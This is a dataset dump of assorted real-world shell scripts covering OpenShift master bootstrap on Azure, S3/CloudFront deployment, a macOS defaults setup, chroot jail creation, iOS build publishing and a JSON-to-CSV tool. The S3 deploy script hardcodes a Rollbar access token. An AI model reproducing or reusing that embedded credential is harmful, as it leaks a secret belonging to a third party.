code
stringlengths 2
1.05M
| repo_name
stringlengths 5
110
| path
stringlengths 3
922
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 2
1.05M
|
---|---|---|---|---|---|
#!/bin/bash -ex
# TODO: /etc/dnsmasq.d/origin-upstream-dns.conf is currently hardcoded; it
# probably shouldn't be
if [ -f "/etc/sysconfig/atomic-openshift-node" ]; then
SERVICE_TYPE=atomic-openshift
else
SERVICE_TYPE=origin
fi
VERSION="$(rpm -q $SERVICE_TYPE --queryformat %{VERSION})"
if [ -f "/etc/sysconfig/atomic-openshift-node" ]; then
ANSIBLE_DEPLOY_TYPE="openshift-enterprise"
IMAGE_TYPE=ose
IMAGE_PREFIX="registry.access.redhat.com/openshift3"
ANSIBLE_CONTAINER_VERSION="v${VERSION}"
PROMETHEUS_EXPORTER_VERSION="v${VERSION}"
COCKPIT_PREFIX="${IMAGE_PREFIX}"
COCKPIT_BASENAME="registry-console"
COCKPIT_VERSION="v${VERSION}"
else
ANSIBLE_DEPLOY_TYPE="origin"
IMAGE_TYPE="${SERVICE_TYPE}"
IMAGE_PREFIX="openshift"
# FIXME: These versions are set to deal with differences in how Origin and OCP
# components are versioned
ANSIBLE_CONTAINER_VERSION="v${VERSION%.*}"
COCKPIT_PREFIX="cockpit"
COCKPIT_BASENAME="kubernetes"
COCKPIT_VERSION="latest"
fi
systemctl restart docker.service
echo "BOOTSTRAP_CONFIG_NAME=node-config-master" >>/etc/sysconfig/${SERVICE_TYPE}-node
for dst in tcp,2379 tcp,2380 tcp,8443 tcp,8444 tcp,8053 udp,8053 tcp,9090; do
proto=${dst%%,*}
port=${dst##*,}
iptables -A OS_FIREWALL_ALLOW -p $proto -m state --state NEW -m $proto --dport $port -j ACCEPT
done
iptables-save >/etc/sysconfig/iptables
sed -i -e "s#--master=.*#--master=https://$(hostname --fqdn):8443#" /etc/sysconfig/${SERVICE_TYPE}-master-api
sed -i -e "s#--loglevel=2#--loglevel=4#" /etc/sysconfig/${SERVICE_TYPE}-master-api
sed -i -e "s#--loglevel=2#--loglevel=4#" /etc/sysconfig/${SERVICE_TYPE}-master-controllers
rm -rf /etc/etcd/* /etc/origin/master/* /etc/origin/node/*
oc adm create-bootstrap-policy-file --filename=/etc/origin/master/policy.json
( cd / && base64 -d <<< {{ .ConfigBundle }} | tar -xz)
cp /etc/origin/node/ca.crt /etc/pki/ca-trust/source/anchors/openshift-ca.crt
update-ca-trust
# FIXME: It is horrible that we're installing az. Try to avoid adding
# additional functionality in this script that requires it. One route to remove
# this code is to bake this script into the base image, then pass in parameters
# such as the registry storage account name and key direct from ARM.
rpm -i https://packages.microsoft.com/yumrepos/azure-cli/azure-cli-2.0.31-1.el7.x86_64.rpm
set +x
. <(sed -e 's/: */=/' /etc/azure/azure.conf)
az login --service-principal -u "$aadClientId" -p "$aadClientSecret" --tenant "$aadTenantId" &>/dev/null
REGISTRY_STORAGE_AZURE_ACCOUNTNAME=$(az storage account list -g "$resourceGroup" --query "[?ends_with(name, 'registry')].name" -o tsv)
REGISTRY_STORAGE_AZURE_ACCOUNTKEY=$(az storage account keys list -g "$resourceGroup" -n "$REGISTRY_STORAGE_AZURE_ACCOUNTNAME" --query "[?keyName == 'key1'].value" -o tsv)
az logout
set -x
###
# retrieve the public ip via dns for the router public ip and sub it in for the routingConfig.subdomain
###
routerLBHost="{{.RouterLBHostname}}"
routerLBIP=$(dig +short $routerLBHost)
# NOTE: The version of openshift-ansible for origin defaults the ansible var
# openshift_prometheus_node_exporter_image_version correctly as needed by
# origin, but for OCP it does not.
#
# This is fixed in openshift/openshift-ansible@c27a0f4, which is in
# openshift-ansible >= 3.9.15, so once we're shipping OCP >= v3.9.15 we
# can remove this and the definition of the cooresonding variable in the
# ansible inventory file.
if [[ "${ANSIBLE_DEPLOY_TYPE}" == "origin" ]]; then
sed -i "/PROMETHEUS_EXPORTER_VERSION/d" /tmp/ansible/azure-local-master-inventory.yml
else
sed -i "s|PROMETHEUS_EXPORTER_VERSION|${PROMETHEUS_EXPORTER_VERSION}|g;" /tmp/ansible/azure-local-master-inventory.yml
fi
for i in /etc/origin/master/master-config.yaml /tmp/bootstrapconfigs/* /tmp/ansible/azure-local-master-inventory.yml; do
sed -i "s/TEMPROUTERIP/${routerLBIP}/; s|IMAGE_PREFIX|$IMAGE_PREFIX|g; s|ANSIBLE_DEPLOY_TYPE|$ANSIBLE_DEPLOY_TYPE|g" $i
sed -i "s|REGISTRY_STORAGE_AZURE_ACCOUNTNAME|${REGISTRY_STORAGE_AZURE_ACCOUNTNAME}|g; s|REGISTRY_STORAGE_AZURE_ACCOUNTKEY|${REGISTRY_STORAGE_AZURE_ACCOUNTKEY}|g" $i
sed -i "s|COCKPIT_VERSION|${COCKPIT_VERSION}|g; s|COCKPIT_BASENAME|${COCKPIT_BASENAME}|g; s|COCKPIT_PREFIX|${COCKPIT_PREFIX}|g;" $i
sed -i "s|VERSION|${VERSION}|g; s|SHORT_VER|${VERSION%.*}|g; s|SERVICE_TYPE|${SERVICE_TYPE}|g; s|IMAGE_TYPE|${IMAGE_TYPE}|g" $i
sed -i "s|HOSTNAME|${HOSTNAME}|g;" $i
done
# note: ${SERVICE_TYPE}-node crash loops until master is up
for unit in etcd.service ${SERVICE_TYPE}-master-api.service ${SERVICE_TYPE}-master-controllers.service; do
systemctl enable $unit
systemctl start $unit
done
mkdir -p /root/.kube
cp /etc/origin/master/admin.kubeconfig /root/.kube/config
export KUBECONFIG=/etc/origin/master/admin.kubeconfig
while ! curl -o /dev/null -m 2 -kfs https://localhost:8443/healthz; do
sleep 1
done
while ! oc get svc kubernetes &>/dev/null; do
sleep 1
done
oc create -f - <<'EOF'
kind: StorageClass
apiVersion: storage.k8s.io/v1beta1
metadata:
name: azure
annotations:
storageclass.kubernetes.io/is-default-class: "true"
provisioner: kubernetes.io/azure-disk
parameters:
skuName: Premium_LRS
location: {{ .Location }}
kind: managed
EOF
oc create configmap node-config-master --namespace openshift-node --from-file=node-config.yaml=/tmp/bootstrapconfigs/master-config.yaml
oc create configmap node-config-compute --namespace openshift-node --from-file=node-config.yaml=/tmp/bootstrapconfigs/compute-config.yaml
oc create configmap node-config-infra --namespace openshift-node --from-file=node-config.yaml=/tmp/bootstrapconfigs/infra-config.yaml
# must start ${SERVICE_TYPE}-node after master is fully up and running
# otherwise the implicit dns change may cause master startup to fail
systemctl enable ${SERVICE_TYPE}-node.service
systemctl start ${SERVICE_TYPE}-node.service &
chmod +x /tmp/ansible/ansible.sh
docker run \
--rm \
-u "$(id -u)" \
-v /etc/origin:/etc/origin:z \
-v /tmp/ansible:/opt/app-root/src:z \
-v /root/.kube:/opt/app-root/src/.kube:z \
-w /opt/app-root/src \
-e IMAGE_BASE="${IMAGE_PREFIX}/${IMAGE_TYPE}" \
-e VERSION="$VERSION" \
-e HOSTNAME="$(hostname)" \
--network="host" \
"${IMAGE_PREFIX}/${IMAGE_TYPE}-ansible:${ANSIBLE_CONTAINER_VERSION}" \
/opt/app-root/src/ansible.sh
|
rjtsdl/acs-engine
|
parts/openshift/release-3.9/openshiftmasterscript.sh
|
Shell
|
mit
| 6,338 |
#!/bin/bash
# Typically this is the Project name.
# The trailing slash is important
# Can be set to an empty string for working at the top level of the bucket
S3_BUCKET_PREFIX=''
# AWS CloudFront distribution ID
DISTRIBUTION_ID='EGVC56LSD4VPJ'
# AWS CloudFront distribution domain (not used as there are multiple domains for this project, see s3_website.yml)
# DISTRIBUTION_DOMAIN='sagemodeler.concord.org'
# name of branch to deploy to root of site
ROOT_BRANCH='production'
# Bucket to deploy to, typically this is 'model-resources', but some projects
# have their own buckets
S3_BUCKET='building-models-app.concord.org'
# location of built files
SRC_DIR='dist'
# exit when any command fails
set -e
# keep track of the last executed command
trap 'last_command=$current_command; current_command=$BASH_COMMAND' DEBUG
# echo an error message before exiting
trap 'echo "\"${last_command}\" command exited with code $?."' EXIT
# extract current TAG if present
# the 2> is to prevent error messages when no match is found
# the || echo prevents script exit when it doesn't match
CURRENT_TAG=`git describe --tags --exact-match $GITHUB_SHA 2> /dev/null || echo ''`
# Extract the branch or tag name from the GITHUB_REF
# it should either be: refs/head/branch-name or
# or refs/tags/v1.2.3
# since we ought to know if this is a branch or tag based on the ref
# we could simplify the CURRENT_TAG approach above
BRANCH_OR_TAG=${GITHUB_REF#refs/*/}
echo branch or tag: $BRANCH_OR_TAG
# strip PT ID from branch name for branch builds
DEPLOY_DIR_NAME=$BRANCH_OR_TAG
PT_PREFIX_REGEX="^([0-9]{8,}-)(.+)$"
PT_SUFFIX_REGEX="^(.+)(-[0-9]{8,})$"
if [[ $DEPLOY_DIR_NAME =~ $PT_PREFIX_REGEX ]]; then
DEPLOY_DIR_NAME=${BASH_REMATCH[2]}
fi
if [[ $DEPLOY_DIR_NAME =~ $PT_SUFFIX_REGEX ]]; then
DEPLOY_DIR_NAME=${BASH_REMATCH[1]}
fi
# tagged builds deploy to /version/TAG_NAME
if [ "$BRANCH_OR_TAG" = "$CURRENT_TAG" ]; then
mkdir -p _site/version
S3_DEPLOY_DIR="version/$BRANCH_OR_TAG"
DEPLOY_DEST="_site/$S3_DEPLOY_DIR"
INVAL_PATH="/version/$BRANCH_OR_TAG/index.html"
# in this case we are going to deploy this code to a subfolder of version
# So ignore everything except this folder.
# Currently this only escapes `.`
S3_DEPLOY_DIR_ESCAPED=$(sed 's/[.]/[&]/g;' <<<"$S3_DEPLOY_DIR")
IGNORE_ON_SERVER="^(?!$S3_BUCKET_PREFIX$S3_DEPLOY_DIR_ESCAPED/)"
# root branch builds deploy to root of site
elif [ "$BRANCH_OR_TAG" = "$ROOT_BRANCH" ]; then
DEPLOY_DEST="_site"
INVAL_PATH="/index.html"
# in this case we are going to deploy this branch to the top level
# so we need to ignore the version and branch folders
IGNORE_ON_SERVER="^$S3_BUCKET_PREFIX(version/|branch/)"
# branch builds deploy to /branch/BRANCH_NAME
else
mkdir -p _site/branch
S3_DEPLOY_DIR="branch/$DEPLOY_DIR_NAME"
DEPLOY_DEST="_site/$S3_DEPLOY_DIR"
INVAL_PATH="/branch/$DEPLOY_DIR_NAME/index.html"
# in this case we are going to deploy this code to a subfolder of branch
# So ignore everything except this folder.
# Currently this only escapes `.`
S3_DEPLOY_DIR_ESCAPED=$(sed 's/[.]/[&]/g;' <<<"$S3_DEPLOY_DIR")
IGNORE_ON_SERVER="^(?!$S3_BUCKET_PREFIX$S3_DEPLOY_DIR_ESCAPED/)"
fi
# used by s3_website.yml
export S3_BUCKET_PREFIX
export IGNORE_ON_SERVER
export DISTRIBUTION_ID
# export DISTRIBUTION_DOMAIN
export S3_BUCKET
# copy files to destination
mv $SRC_DIR $DEPLOY_DEST
# deploy the site contents
echo Deploying "$BRANCH_OR_TAG" to "$S3_BUCKET:$S3_BUCKET_PREFIX$S3_DEPLOY_DIR"...
echo Pushing to S3
s3_website push --site _site
# Let rollbar know of our new deployment:
# https://rollbar.com/knowuh/Sage deployment tracking
ACCESS_TOKEN=daa3852e6c4f46008fc4043793a0ff38
if [ "$BRANCH_OR_TAG" = "production" ]; then
ENVIRONMENT="production"
elif [ "$BRANCH_OR_TAG" = "master" ]; then
ENVIRONMENT="staging"
else
ENVIRONMENT="development"
fi
REVISION=`git log -n 1 --pretty=format:"%h"`
echo "Sending deploy notice to rollbar.com"
curl https://api.rollbar.com/api/1/deploy/ \
-F access_token=$ACCESS_TOKEN \
-F environment=$ENVIRONMENT \
-F revision="\`$REVISION $BRANCH_OR_TAG\`" \
-F local_username=Travis\
-F comment="available at https://sage.concord.org/branch/$BRANCH_OR_TAG/"
# explicit CloudFront invalidation to workaround s3_website gem invalidation bug
# with origin path (https://github.com/laurilehmijoki/s3_website/issues/207).
echo Invalidating CloudFront at "$INVAL_PATH"...
aws cloudfront create-invalidation --distribution-id $DISTRIBUTION_ID --paths $INVAL_PATH
|
concord-consortium/building-models
|
s3_deploy.sh
|
Shell
|
mit
| 4,499 |
#!/bin/bash
test_method=$1
client_num=$2
packet_size=$3
test_method=${test_method:-pingpong}
client_num=${client_num:-10}
packet_size=${packet_size:-64}
# echo "test_method = $test_method"
# echo "client_num = $client_num"
# echo "packet_size = $packet_size"
for ((i=0; i<$client_num; i++));
do
./asio_echo_client --host=127.0.0.1 --port=8090 --mode=echo --test=$test_method --packet-size=$packet_size &
done
|
shines77/netlib_test
|
start_local_client.sh
|
Shell
|
mit
| 417 |
#!/bin/sh -e
SYSTEM=$(uname)
if [ "${SYSTEM}" = Darwin ]; then
SED='gsed'
else
SED='sed'
fi
VENDOR_NAME_CAMEL='FunTimeCoding'
export VENDOR_NAME_CAMEL
PROJECT_NAME_CAMEL='PythonSkeleton'
export PROJECT_NAME_CAMEL
PROJECT_NAME_DASH='python-skeleton'
export PROJECT_NAME_DASH
PROJECT_NAME_UNDERSCORE=$(echo "${PROJECT_NAME_DASH}" | ${SED} --regexp-extended 's/-/_/g')
export PROJECT_NAME_UNDERSCORE
PROJECT_NAME_INITIALS=$(echo "${PROJECT_NAME_CAMEL}" | ${SED} 's/\([A-Z]\)[a-z]*/\1/g' | tr '[:upper:]' '[:lower:]')
BLOCKED_INITIALS='ps
pu'
echo "${PROJECT_NAME_INITIALS}" | grep --quiet "^${BLOCKED_INITIALS}$" && ARE_INITIALS_BLOCKED=true || ARE_INITIALS_BLOCKED=false
if [ "${ARE_INITIALS_BLOCKED}" = true ]; then
PROJECT_NAME_INITIALS=$(echo "${PROJECT_NAME_CAMEL}" | ${SED} 's/\([A-Z][a-z]\)[a-z]*/\1/g' | tr '[:upper:]' '[:lower:]')
fi
export PROJECT_NAME_INITIALS
PROJECT_VERSION='0.1.0'
export PROJECT_VERSION
PACKAGE_VERSION='1'
export PACKAGE_VERSION
MAINTAINER='Alexander Reitzel'
export MAINTAINER
EMAIL='[email protected]'
export EMAIL
COMBINED_VERSION="${PROJECT_VERSION}-${PACKAGE_VERSION}"
export COMBINED_VERSION
VENDOR_NAME_LOWER=$(echo "${VENDOR_NAME_CAMEL}" | tr '[:upper:]' '[:lower:]')
export VENDOR_NAME_LOWER
# build, tmp, .git, .idea, .scannerwork, .tox, .cache, __pycache__, *.egg-info: Nothing will ever have to be replaced by this.
# vendor: Do not not break php-skeleton based projects when synchronizing with them.
# node_modules: Do not not break java-script-skeleton based projects.
# target: Do not not break java-skeleton based projects.
# shellcheck disable=SC1117
EXCLUDE_FILTER='^.*\/(build|tmp|vendor|node_modules|target|\.git|\.vagrant|\.idea|\.scannerwork|\.tox|\.cache|__pycache__|[a-z_]+\.egg-info)\/.*$'
export EXCLUDE_FILTER
# lib: shell, ruby
# src: php, java, clojure, scala, c-sharp
# test: php
# benchmark: php
# tests: python
# spec: ruby
# PROJECT_NAME_UNDERSCORE: python
# TODO: Test and expand this through all skeleton projects.
# shellcheck disable=SC1117
INCLUDE_FILTER="^\.\/((src|test|benchmark|tests|spec|lib|debian|configuration|documentation|test|script\/skeleton|helm-chart|${PROJECT_NAME_UNDERSCORE})\/.*|\.gitignore|Vagrantfile|Dockerfile|README.md|package\.json|sonar-project\.properties|web\/index\.html|composer\.json|setup\.py|pom.xml|.*\.gemspec|.*\.cabal)$"
export INCLUDE_FILTER
INCLUDE_STILL_FILTER='^.*\/__pycache__\/.*$'
export INCLUDE_STILL_FILTER
EXCLUDE_DOCUMENTATION_FILTER='^\.\/(documentation\/dictionary)\/.*$'
export EXCLUDE_DOCUMENTATION_FILTER
|
FunTimeCoding/python-skeleton
|
configuration/project.sh
|
Shell
|
mit
| 2,561 |
#! /bin/bash
source "$HOME/seartipy/dotfiles/scripts/utils.sh"
common_install() {
sudo apt install --no-install-recommends arc-theme ttf-ubuntu-font-family policykit-1
}
i3_install() {
sudo apt install --no-install-recommends i3 i3status
}
lxde_install() {
sudo apt install --no-install-recommends lxde-core lxsession-logout lxde-common lxdm obconf lxappearance arc-theme ttf-ubuntu-font-family lxterminal lxpolkit
}
xfce_install() {
# lxdm does not work for some reason
sudo apt install --no-install-recommends xfce4 xfce4-terminal slim
}
mate_install() {
# might need to install mate-applets-common at least, may want mate-control-center too
# you need to set window manager, as marco is not installed
sudo apt install --no-install-recommends mate-desktop mate-panel mate-polkit mate-session-manager mate-settings-daemon dconf-editor slim mate-terminal
}
mate_recommended_install() {
# might need to install mate-applets-common at least, may want mate-control-center too
# you need to set window manager, as marco is not installed
sudo apt install --no-install-recommends mate-desktop mate-panel mate-polkit mate-session-manager mate-settings-daemon dconf-editor slim mate-terminal mate-control-center mate-applet-topmenu tilda
}
budgie_install() {
sudo apt install --no-install-recommends budgie-core gdm gnome-terminal
}
gnome_install() {
sudo apt install --no-install-recommends gnome-session gdm gnome-terminal
}
gnome_recommended_install() {
sudo apt install --no-install-recommends gnome-session gdm gnome-terminal gnome-tweak-tool gnome-control-center
}
is_yakkety || err_exit "currently only Ubuntu 16.10 supported"
|
pervezfunctor/dotfiles
|
scripts/desktop-installer.sh
|
Shell
|
mit
| 1,694 |
#!/bin/sh
# set reasonable macOS defaults
# inspired by : https://github.com/mathiasbynens/dotfiles
# more can be found here : https://gist.github.com/brandonb927/3195465
if [ "$(uname -s)" != "Darwin" ]; then
exit 0
fi
set +e
echo " › Automatically quit printer app once the print jobs complete"
defaults write com.apple.print.PrintingPrefs "Quit When Finished" -bool true
echo " › Use AirDrop over every interface. srsly this should be a default."
defaults write com.apple.NetworkBrowser BrowseAllInterfaces 1
echo " › Reveal IP address, hostname, OS version, etc. when clicking the clock in the login window"
sudo defaults write /Library/Preferences/com.apple.loginwindow AdminHostInfo HostName
echo " › show the ~/Library folder"
chflags nohidden ~/Library
echo " › Open Finder in list view"
defaults write com.apple.Finder FXPreferredViewStyle Nlsv
echo " › disable smart quotes and smart dashes as they're annoying when typing code"
defaults write NSGlobalDomain NSAutomaticQuoteSubstitutionEnabled -bool false
defaults write NSGlobalDomain NSAutomaticDashSubstitutionEnabled -bool false
echo " › Show path bar"
defaults write com.apple.finder ShowPathbar -bool true
echo " › Requiring password immediately after sleep or screen saver begins"
defaults write com.apple.screensaver askForPassword -int 1
defaults write com.apple.screensaver askForPasswordDelay -int 0
echo " › Disable the menubar transparency? (y/n)"
read -r response
if [[ $response =~ ^([yY][eE][sS]|[yY])$ ]]; then
defaults write com.apple.universalaccess reduceTransparency -bool true
fi
echo " › Disable auto-correct? (y/n)"
defaults write NSGlobalDomain NSAutomaticSpellingCorrectionEnabled -bool false
|
redconfetti/dotfiles
|
roles/macos/files/set-defaults.sh
|
Shell
|
mit
| 1,726 |
#!/bin/bash
# check that we ar running as root
if [ "$(whoami)" == "root" ] ; then
:
else
echo "Usage: !! run as root"
exit 1
fi
# First create some directories. The top one will be the jail.
# Under that we will create directories that look like the ones
# that you would see in a root file system.
D="$1"
U="$2"
G="$3"
if [ -z "${D}" ] ; then
echo "Usage: create-jail.sh PathToJail UserToCreate GroupToUse - PathToJail can not be empty"
exit 1
fi
if [ -z "${U}" ] ; then
echo "Usage: create-jail.sh PathToJail UserToCreate GroupToUse - UserToCreate can not be empty"
exit 1
fi
if [ -z "${G}" ] ; then
echo "Usage: create-jail.sh PathToJail UserToCreate GroupToUse - GroupToUse can not be empty"
exit 1
fi
mkdir -p ${D}/bin
mkdir -p ${D}/home/emailrelay
mkdir -p ${D}/etc
mkdir -p ${D}/dev
mkdir -p ${D}/tmp
mkdir -p ${D}/lib
mkdir -p ${D}/lib64
mkdir -p ${D}/var/log
# Now let's create some devices that programs will need.
cd ${D}/dev
/bin/mknod -m 0666 ${D}/dev/null c 1 3
/bin/mknod -m 0666 ${D}/dev/random c 1 8
/bin/mknod -m 0444 ${D}/dev/urandom c 1 9
# Now the account that the program will run under.
groupadd ${G}
useradd -m -s /bin/false -d ${D}/home/${U} -g ${G} ${U}
# Now the directory where the executable will be.
cd ${D}/home/${U}
mkdir -p Projects/email-relay/log
chown -R ${U}:${G} *
# While I am in the login directory for this new user I will take a look
# at any extra files that may have been created. I usually remove them.
ls -a
rm -rf .mozilla
echo "Should copy in the executable now and then run part 2, ./create-jail-pt2.sh"
|
pschlump/daemon-it
|
example/create-jail.sh
|
Shell
|
mit
| 1,582 |
function failed() {
echo "Failed: $@" >&2
exit 1
}
# 当前目录
CURRENT_DIR=${PWD}
# 获取脚本所在目录
SCRIPT_DIR_RELATIVE=`dirname $0`
SCRIPT_DIR=`cd ${SCRIPT_DIR_RELATIVE}; pwd`
echo "SCRIPT_DIR = ${SCRIPT_DIR}"
# 读取配置
. ${SCRIPT_DIR}/iosPublish.config
mkdir -pv ${APP_DIR} || failed "mkdir ${APP_DIR}"
cd ${PROJECT_DIR} || failed "cd ${PROJECT_DIR}"
# clean
xcodebuild -workspace ${WORKSPACE_NAME}.xcworkspace -scheme ${SCHEME_NAME} -sdk ${SDK_VERSION} -configuration ${CONFIGURATION} ONLY_ACTIVE_ARCH=NO clean || failed "xcodebuild clean"
# archive
xcodebuild -workspace ${WORKSPACE_NAME}.xcworkspace -scheme ${SCHEME_NAME} -sdk ${SDK_VERSION} -configuration ${CONFIGURATION} -destination ${ARCHIVE_DESTINATION} -archivePath ${APP_DIR}/${APP_NAME}.xcarchive ONLY_ACTIVE_ARCH=NO archive || failed "xcodebuild archive"
# export ipa
TIMESTAMP=`date "+%Y_%m_%d_%H_%M_%S"`
IPA_PATH_NO_SUFFIX=${APP_DIR}/${APP_NAME}_${TIMESTAMP}
xcodebuild -exportArchive -archivePath ${APP_DIR}/${APP_NAME}.xcarchive -exportPath ${IPA_PATH_NO_SUFFIX} -exportProvisioningProfile "${PROFILE_NAME}" -exportFormat ipa -verbose || failed "xcodebuild export archive"
# upload to fir.im
fir publish ${IPA_PATH_NO_SUFFIX}.ipa -T ${FIR_TOKEN} || failed "fir publish"
cd ${CURRENT_DIR}
echo "done..."
|
GreedBell/resource
|
shell/iosPublish/iosPublish.sh
|
Shell
|
mit
| 1,309 |
#!/bin/bash
echo 'Available PyPI servers on your ~/.pypirc:'
python bin/pypi-servers.py
echo
read -r -p "Choose PyPI index-server: " PYPI_SERVER
python setup.py -q sdist upload -r "$PYPI_SERVER"
|
globocom/alf
|
bin/upload.sh
|
Shell
|
mit
| 197 |
#!/bin/bash
cpuTemp0=$(cat /sys/class/thermal/thermal_zone0/temp)
cpuTemp1=$(($cpuTemp0/1000))
cpuTemp2=$(($cpuTemp0/100))
cpuTempM=$(($cpuTemp2 % $cpuTemp1))
# TODO: Add the degree symbol once we get tmux and fbterm stuff set up
# TODO: Get rid of the apostrophe in the GPU temperature readout
# TODO: what about the quad core stuff of Raspberry Pi 2?
# TODO: Color code therma temperatures. Green, yellow, orange, red. Red is bad!
cputemp=$(echo "$cpuTemp1.$cpuTempM C")
gputemp=$(/opt/vc/bin/vcgencmd measure_temp | sed -n "s/'/ /;p" | sed -n 's/temp=//p')
# echo "CPU temp=$cpuTemp1.$cpuTempM C"
# echo GPU $gputemp
echo "CPU $cputemp GPU $gputemp"
|
jrcharney/hacktop
|
scripts/thermal.sh
|
Shell
|
mit
| 656 |
#!/bin/sh
if test ! -f sql/mysqld.cc
then
echo "You must run this script from the MySQL top-level directory"
exit 1
fi
prefix_configs="--prefix=/usr/local/mysql"
just_print=
just_configure=
full_debug=
if test -n "$MYSQL_BUILD_PREFIX"
then
prefix_configs="--prefix=$MYSQL_BUILD_PREFIX"
fi
while test $# -gt 0
do
case "$1" in
--prefix=* ) prefix_configs="$1"; shift ;;
--with-debug=full ) full_debug="=full"; shift ;;
-c | --just-configure ) just_configure=1; shift ;;
-n | --just-print | --print ) just_print=1; shift ;;
-h | --help ) cat <<EOF; exit 0 ;;
Usage: $0 [-h|-n] [configure-options]
-h, --help Show this help message.
-n, --just-print Don't actually run any commands; just print them.
-c, --just-configure Stop after running configure.
--with-debug=full Build with full debug.
--prefix=path Build with prefix 'path'.
Note: this script is intended for internal use by MySQL developers.
EOF
* )
echo "Unknown option '$1'"
echo "Use -h or --help for usage"
exit 1
break ;;
esac
done
set -e
export AM_MAKEFLAGS
AM_MAKEFLAGS="-j 4"
# SSL library to use.
SSL_LIBRARY=--with-yassl
# If you are not using codefusion add "-Wpointer-arith" to WARNINGS
# The following warning flag will give too many warnings:
# -Wunused -Winline (The later isn't usable in C++ as
# __attribute()__ doesn't work with gnu C++)
global_warnings="-Wimplicit -Wreturn-type -Wswitch -Wtrigraphs -Wcomment -W -Wchar-subscripts -Wformat -Wparentheses -Wsign-compare -Wwrite-strings -Wunused-function -Wunused-label -Wunused-value -Wunused-variable"
#
# For more warnings, uncomment the following line
# global_warnings="$global_warnings -Wshadow"
c_warnings="$global_warnings -Wunused"
cxx_warnings="$global_warnings -Woverloaded-virtual -Wsign-promo -Wreorder -Wctor-dtor-privacy -Wnon-virtual-dtor"
base_max_configs="--with-innodb --with-ndbcluster --with-archive-storage-engine --with-big-tables --with-blackhole-storage-engine --with-federated-storage-engine --with-csv-storage-engine $SSL_LIBRARY"
base_max_no_ndb_configs="--with-innodb --without-ndbcluster --with-archive-storage-engine --with-big-tables --with-blackhole-storage-engine --with-federated-storage-engine --with-csv-storage-engine $SSL_LIBRARY"
max_leave_isam_configs="--with-innodb --with-ndbcluster --with-archive-storage-engine --with-federated-storage-engine --with-blackhole-storage-engine --with-csv-storage-engine $SSL_LIBRARY --with-embedded-server --with-big-tables"
max_configs="$base_max_configs --with-embedded-server"
max_no_ndb_configs="$base_max_no_ndb_configs --with-embedded-server"
path=`dirname $0`
. "$path/check-cpu"
alpha_cflags="$check_cpu_cflags -Wa,-m$cpu_flag"
amd64_cflags="$check_cpu_cflags"
pentium_cflags="$check_cpu_cflags"
pentium64_cflags="$check_cpu_cflags -m64"
ppc_cflags="$check_cpu_cflags"
sparc_cflags=""
# be as fast as we can be without losing our ability to backtrace
fast_cflags="-O3 -fno-omit-frame-pointer"
# this is one is for someone who thinks 1% speedup is worth not being
# able to backtrace
reckless_cflags="-O3 -fomit-frame-pointer "
debug_cflags="-DUNIV_MUST_NOT_INLINE -DEXTRA_DEBUG -DFORCE_INIT_OF_VARS -DSAFEMALLOC -DPEDANTIC_SAFEMALLOC -DSAFE_MUTEX"
debug_extra_cflags="-O1 -Wuninitialized"
base_cxxflags="-felide-constructors -fno-exceptions -fno-rtti"
amd64_cxxflags="" # If dropping '--with-big-tables', add here "-DBIG_TABLES"
base_configs="$prefix_configs --enable-assembler --with-extra-charsets=complex --enable-thread-safe-client --with-big-tables"
if test -d "$path/../cmd-line-utils/readline"
then
base_configs="$base_configs --with-readline"
elif test -d "$path/../cmd-line-utils/libedit"
then
base_configs="$base_configs --with-libedit"
fi
static_link="--with-mysqld-ldflags=-all-static --with-client-ldflags=-all-static"
amd64_configs=""
alpha_configs="" # Not used yet
pentium_configs=""
sparc_configs=""
# we need local-infile in all binaries for rpl000001
# if you need to disable local-infile in the client, write a build script
# and unset local_infile_configs
local_infile_configs="--enable-local-infile"
debug_configs="--with-debug$full_debug"
if [ -z "$full_debug" ]
then
debug_cflags="$debug_cflags $debug_extra_cflags"
fi
if gmake --version > /dev/null 2>&1
then
make=gmake
else
make=make
fi
if test -z "$CC" ; then
CC=gcc
fi
if test -z "$CXX" ; then
CXX=gcc
fi
# If ccache (a compiler cache which reduces build time)
# (http://samba.org/ccache) is installed, use it.
# We use 'grep' and hope 'grep' will work as expected
# (returns 0 if finds lines)
if ccache -V > /dev/null 2>&1
then
echo "$CC" | grep "ccache" > /dev/null || CC="ccache $CC"
echo "$CXX" | grep "ccache" > /dev/null || CXX="ccache $CXX"
fi
# gcov
# The -fprofile-arcs and -ftest-coverage options cause GCC to instrument the
# code with profiling information used by gcov.
# The -DDISABLE_TAO_ASM is needed to avoid build failures in Yassl.
# The -DHAVE_gcov enables code to write out coverage info even when crashing.
gcov_compile_flags="-fprofile-arcs -ftest-coverage"
gcov_compile_flags="$gcov_compile_flags -DDISABLE_TAO_ASM"
gcov_compile_flags="$gcov_compile_flags -DMYSQL_SERVER_SUFFIX=-gcov -DHAVE_gcov"
# GCC4 needs -fprofile-arcs -ftest-coverage on the linker command line (as well
# as on the compiler command line), and this requires setting LDFLAGS for BDB.
gcov_link_flags="-fprofile-arcs -ftest-coverage"
gcov_configs="--disable-shared"
# gprof
gprof_compile_flags="-O2 -pg -g"
gprof_link_flags="--disable-shared $static_link"
|
pieter/mysql-server
|
BUILD/SETUP.sh
|
Shell
|
gpl-2.0
| 5,583 |
#!/usr/bin/env bash
#
# jsonv 0.2.0
# A Bash command line tool for converting JSON to CSV
#
# Copyright (c) 2013 Paul Engel, released under the MIT license
# https://github.com/archan937/jsonv.sh
#
# Get a JSON file
#
# Example (e.g. example.json)
#
# [
# {
# "name": "Dagny Taggart",
# "id": 1,
# "age": 39
# }, {
# "name": "Francisco D'Anconia",
# "id": 8,
# "age": 40
# }, {
# "name": "Hank Rearden (a.k.a \"The Tank\")",
# "id": 12,
# "age": 46
# }
# ]
#
# Command line usage
#
# Call `jsonv` and pass the paths of the values used for the CSV columns (comma separated).
# Optionally, you can pass a prefix for the paths as a second argument.
#
# Example
#
# $ cat examples/simple.json | ./jsonv id,name,age
# 1,"Dagny Taggart",39
# 8,"Francisco D'Anconia",40
# 12,"Hank Rearden (a.k.a \"The Tank\")",46
#
# $ cat examples/simple.json | ./jsonv id,name,age > example.csv
# $ cat example.csv
# 1,"Dagny Taggart",39
# 8,"Francisco D'Anconia",40
# 12,"Hank Rearden (a.k.a \"The Tank\")",46
#
dir=$(cd `dirname $0` && pwd)
if [[ $dir =~ \/bin$ ]]; then
awk=$dir/.jsonv/json.awk
log=$dir/.jsonv/log
json=$dir/.jsonv/json
tokens=$dir/.jsonv/tokens
map=$dir/.jsonv/map
else
awk=$dir/json.awk
log=$dir/tmp/log
json=$dir/tmp/json
tokens=$dir/tmp/tokens
map=$dir/tmp/map
